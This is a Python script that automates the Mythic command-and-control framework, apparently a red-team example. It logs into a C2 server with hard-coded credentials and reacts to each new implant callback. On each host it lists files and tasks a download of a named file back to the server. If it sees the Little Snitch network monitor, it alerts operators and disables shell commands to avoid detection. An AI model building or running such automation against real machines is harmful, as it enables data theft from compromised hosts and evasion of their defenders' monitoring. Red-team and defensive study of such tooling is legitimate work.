import json

from mythic import mythic_rest
async def scripting():
    """Create the Mythic client and subscribe to new-callback events.

    Builds a ``mythic_rest.Mythic`` client, calls
    ``set_or_create_apitoken()`` on it, and then passes ``analyze_callback``
    to ``listen_for_new_callbacks()`` so it is run for new callbacks.

    The statements live in a coroutine because ``await`` is only legal inside
    ``async def``. This coroutine must be awaited from a running event loop;
    the driver that starts and keeps that loop alive is not part of this
    section.
    """
    # NOTE(review): only a password and server IP are supplied here and no
    # explicit login call is made before requesting the API token -- confirm
    # whether a username / port / ssl settings / login step are required.
    # NOTE(review): credentials are hard-coded; consider reading them from
    # the environment or a config file before using this outside a lab.
    mythic = mythic_rest.Mythic(
        password="mythic_password",
        server_ip="192.168.205.151",
    )
    print("[+] Logging into Mythic")
    await mythic.set_or_create_apitoken()
    # Register the handler to execute on each new callback. The name
    # analyze_callback is looked up when this coroutine runs, so it may be
    # defined later in the module.
    await mythic.listen_for_new_callbacks(analyze_callback)
async def analyze_callback(mythic, callback):
    """Triage a new callback: list files, then check running applications.

    Steps performed, in order:

    1. Task the callback with ``ls .`` and wait for it to complete. If a file
       named ``apfellserver`` is listed, task a ``download`` of it.
    2. Task the callback with ``list_apps`` and gather its responses. For each
       application whose name contains ``"Little Snitch Agent"``: comment the
       task, post a warning event message, make sure the
       ``"snitchy block list"`` disabled-commands profile exists, and apply
       that profile to every member of the current operation.

    Args:
        mythic: The ``mythic_rest.Mythic`` client instance handed to the
            handler.
        callback: The new callback object to task.
    """
    # create a new task to execute on this callback
    task = mythic_rest.Task(callback=callback, command="ls", params=".")
    print("[+] got new callback, issuing ls")
    submit = await mythic.create_task(task, return_on="completed")
    print("[*] waiting for ls results...")
    # wait up to 20s for the task to finish and get all the responses from it
    results = await mythic.gather_task_responses(submit.response.id, timeout=20)
    # results is an array of responses; it can be empty (e.g. on timeout), so
    # guard before indexing instead of dying with IndexError.
    if results:
        folder = json.loads(results[0].response)
        print("[*] going through results looking for interesting files...")
        for f in folder["files"]:
            if f["name"] == "apfellserver":
                task = mythic_rest.Task(
                    callback=callback, command="download", params="apfellserver"
                )
                print("[+] found an interesting file, tasking it for download")
                await mythic.create_task(task, return_on="submitted")
    else:
        print("[-] no ls responses received, skipping file review")

    task = mythic_rest.Task(callback=callback, command="list_apps")
    print("[+] tasking callback to list running applications")
    # return_on="submitted" means don't wait for responses
    list_apps_submit = await mythic.create_task(task, return_on="submitted")
    print("[*] waiting for list_apps results...")
    # instead, we'll manually gather tasks until the task is completed or errors out
    results = await mythic.gather_task_responses(list_apps_submit.response.id)
    # gather responses returns an array of responses
    if not results:
        print("[-] no list_apps responses received, nothing to analyze")
        return
    apps = json.loads(results[0].response)
    print("[*] going through results looking for dangerous processes...")
    for a in apps:
        if "Little Snitch Agent" not in a["name"]:
            continue
        list_apps_submit.response.comment = "Auto processed, created alert on Little Snitch Agent, updating block lists"
        await mythic.set_comment_on_task(list_apps_submit.response)
        print("[+] found a dangerous process! Little Snitch Agent - sending alert to operators")
        await mythic.create_event_message(message=mythic_rest.EventMessage(message="LITTLE SNITCH DETECTED on {}".format(callback.host), level='warning'))
        print("[+] Getting/creating disabled command profile to prevent bad-opsec commands based on dangerous processes")
        dcp = await _get_or_create_snitch_block_list(mythic)
        current_operation = (await mythic.get_current_operation_info()).response
        for member in current_operation.members:
            print("[*] updating block list for {}".format(member.username))
            await mythic.update_disabled_commands_profile_for_operator(profile=dcp, operator=member, operation=current_operation)


async def _get_or_create_snitch_block_list(mythic):
    """Return the "snitchy block list" profile, creating it when absent.

    Reusing the profile found on the server keeps ``dcp`` bound on both
    paths; previously it was only assigned when the profile had to be
    created, so the per-operator update failed whenever it already existed.
    """
    profile_name = "snitchy block list"
    resp = await mythic.get_all_disabled_commands_profiles()
    dcp = next((p for p in resp.response if p.name == profile_name), None)
    if dcp is None:
        dcp = mythic_rest.DisabledCommandsProfile(
            name=profile_name,
            payload_types=[
                mythic_rest.PayloadType(ptype="apfell", commands=["shell", "shell_elevated"]),
                mythic_rest.PayloadType(ptype="poseidon", commands=["shell"]),
            ],
        )
        await mythic.create_disabled_commands_profile(dcp)
    return dcp